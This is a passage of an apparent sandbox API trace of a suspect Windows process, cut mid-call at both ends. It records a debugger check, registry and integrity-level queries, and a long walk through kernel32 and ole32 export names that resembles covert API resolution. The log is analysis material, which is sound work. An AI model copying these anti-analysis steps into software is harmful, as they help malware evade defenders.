returned="EnumDateFormatsW" [0030.869] IsDebuggerPresent () returned 0 [0030.869] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0xc9e8d8 | out: phkResult=0xc9e8d8*=0xe0) returned 0x0 [0030.870] RegQueryValueExW (in: hKey=0xe0, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x190000, lpcbData=0xc9e8dc*=0x400 | out: lpType=0x0, lpData=0x190000*=0x57, lpcbData=0xc9e8dc*=0x2e) returned 0x0 [0030.870] RegCloseKey (hKey=0xe0) returned 0x0 [0030.870] GetCurrentProcess () returned 0xffffffff [0030.870] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xc9e8c0 | out: TokenHandle=0xc9e8c0*=0xe0) returned 1 [0030.870] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xc9e8c4 | out: TokenInformation=0x0, ReturnLength=0xc9e8c4) returned 0 [0030.870] GetLastError () returned 0x7a [0030.870] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x5ebab0 [0030.870] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x19, TokenInformation=0x5ebab0, TokenInformationLength=0x14, ReturnLength=0xc9e8c4 | out: TokenInformation=0x5ebab0, ReturnLength=0xc9e8c4) returned 1 [0030.870] GetSidSubAuthorityCount (pSid=0x5ebab8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x5ebab9 [0030.870] GetSidSubAuthority (pSid=0x5ebab8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x5ebac0 [0030.870] LocalFree (hMem=0x5ebab0) returned 0x0 [0030.870] lstrlenA (lpString="kernel32.dll") returned 12 [0030.871] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0030.871] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0030.871] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0030.871] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0030.871] lstrlenA (lpString="ADDATOMA") returned 8 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0030.871] lstrlenA (lpString="ADDATOMW") returned 8 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0030.871] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0030.871] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0030.871] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0030.871] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0030.871] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0030.871] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0030.871] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0030.871] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0030.871] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0030.871] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0030.871] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0030.871] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0030.872] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0030.872] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0030.872] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0030.872] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0030.872] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0030.872] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0030.872] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0030.872] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0030.872] lstrlenA (lpString="BACKUPREAD") returned 10 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0030.872] lstrlenA (lpString="BACKUPSEEK") returned 10 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0030.872] lstrlenA (lpString="BACKUPWRITE") returned 11 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0030.872] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0030.872] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0030.872] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0030.872] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0030.872] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0030.872] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0030.872] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0030.873] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0030.873] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0030.873] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0030.873] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0030.873] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0030.873] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0030.873] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0030.873] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0030.873] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0030.873] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0030.873] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0030.873] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0030.873] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0030.873] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0030.873] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0030.873] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0030.873] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0030.873] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0030.873] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0030.873] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0030.873] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0030.873] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0030.873] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0030.873] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0030.873] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0030.873] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0030.873] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0030.873] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0030.873] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0030.873] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0030.873] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0030.873] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0030.873] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0030.874] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0030.874] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0030.874] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0030.874] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0030.874] lstrlenA (lpString="BEEP") returned 4 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0030.874] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0030.874] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0030.874] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0030.874] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0030.874] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0030.874] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0030.874] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0030.874] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0030.874] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0030.874] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0030.874] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0030.874] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0030.874] lstrlenA (lpString="CANCELIO") returned 8 [0030.875] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0030.875] lstrlenA (lpString="CANCELIOEX") returned 10 [0030.875] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0030.875] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0030.875] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0030.875] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0030.875] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0030.875] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0030.875] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0030.875] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0030.875] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0030.875] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0030.875] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0030.875] lstrlenA (lpString="CHECKELEVATION") returned 14 [0030.875] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0030.875] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0030.875] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0030.875] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0030.875] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0030.875] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0030.875] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0030.875] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0030.875] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0030.875] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0030.875] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0030.875] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0030.875] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0030.875] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0030.875] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0030.875] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0030.875] lstrcpyA (in: lpString1=0xc9dc3c, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0030.875] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0030.875] CloseHandle (hObject=0xe0) returned 1 [0030.875] VirtualAlloc (lpAddress=0x0, dwSize=0x5000, flAllocationType=0x3000, flProtect=0x4) returned 0x1a0000 [0030.879] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1b0000 [0030.879] lstrlenA (lpString="ole32.dll") returned 9 [0030.879] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x755e0000 [0030.879] lstrcpyA (in: lpString1=0xc9dc40, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0030.879] lstrlenA (lpString="BINDMONIKER") returned 11 [0030.879] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0030.879] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0030.879] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0030.879] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0030.879] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0030.879] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0030.879] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0030.879] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0030.879] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0030.879] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0030.879] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0030.880] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0030.880] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0030.880] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0030.880] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0030.880] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0030.880] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0030.880] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0030.880] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0030.880] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0030.880] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0030.880] lstrlenA (lpString="COBUILDVERSION") returned 14 [0030.880] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0030.880] lstrlenA (lpString="COCANCELCALL") returned 12 [0030.880] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0030.880] lstrlenA (lpString="COCOPYPROXY") returned 11 [0030.880] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0030.880] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0030.880] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0030.880] lstrlenA (lpString="COCREATEGUID") returned 12 [0030.880] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0030.880] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0030.880] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoCreateInstanceEx" | out: lpString1="CoCreateInstanceEx") returned="CoCreateInstanceEx" [0030.880] lstrlenA (lpString="COCREATEINSTANCEEX") returned 18 [0030.880] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoCreateObjectInContext" | out: lpString1="CoCreateObjectInContext") returned="CoCreateObjectInContext" [0030.880] lstrlenA (lpString="COCREATEOBJECTINCONTEXT") returned 23 [0030.880] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoDeactivateObject" | out: lpString1="CoDeactivateObject") returned="CoDeactivateObject" [0030.880] lstrlenA (lpString="CODEACTIVATEOBJECT") returned 18 [0030.880] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoDisableCallCancellation" | out: lpString1="CoDisableCallCancellation") returned="CoDisableCallCancellation" [0030.880] lstrlenA (lpString="CODISABLECALLCANCELLATION") returned 25 [0030.880] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoDisconnectContext" | out: lpString1="CoDisconnectContext") returned="CoDisconnectContext" [0030.880] lstrlenA (lpString="CODISCONNECTCONTEXT") returned 19 [0030.880] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoDisconnectObject" | out: lpString1="CoDisconnectObject") returned="CoDisconnectObject" [0030.880] lstrlenA (lpString="CODISCONNECTOBJECT") returned 18 [0030.881] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoDosDateTimeToFileTime" | out: lpString1="CoDosDateTimeToFileTime") returned="CoDosDateTimeToFileTime" [0030.881] lstrlenA (lpString="CODOSDATETIMETOFILETIME") returned 23 [0030.881] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoEnableCallCancellation" | out: lpString1="CoEnableCallCancellation") returned="CoEnableCallCancellation" [0030.881] lstrlenA (lpString="COENABLECALLCANCELLATION") returned 24 [0030.881] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoFileTimeNow" | out: lpString1="CoFileTimeNow") returned="CoFileTimeNow" [0030.881] lstrlenA (lpString="COFILETIMENOW") returned 13 [0030.881] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoFileTimeToDosDateTime" | out: lpString1="CoFileTimeToDosDateTime") returned="CoFileTimeToDosDateTime" [0030.881] lstrlenA (lpString="COFILETIMETODOSDATETIME") returned 23 [0030.881] lstrcpyA (in: lpString1=0xc9dc40, lpString2="CoFreeAllLibraries" | out: lpString1="CoFreeAllLibraries") returned="CoFreeAllLibraries" [0030.881] lstrlenA (lpString="COFREEALLLIBRARIES") returned 18 [0030.881] lstrcpyA (in: 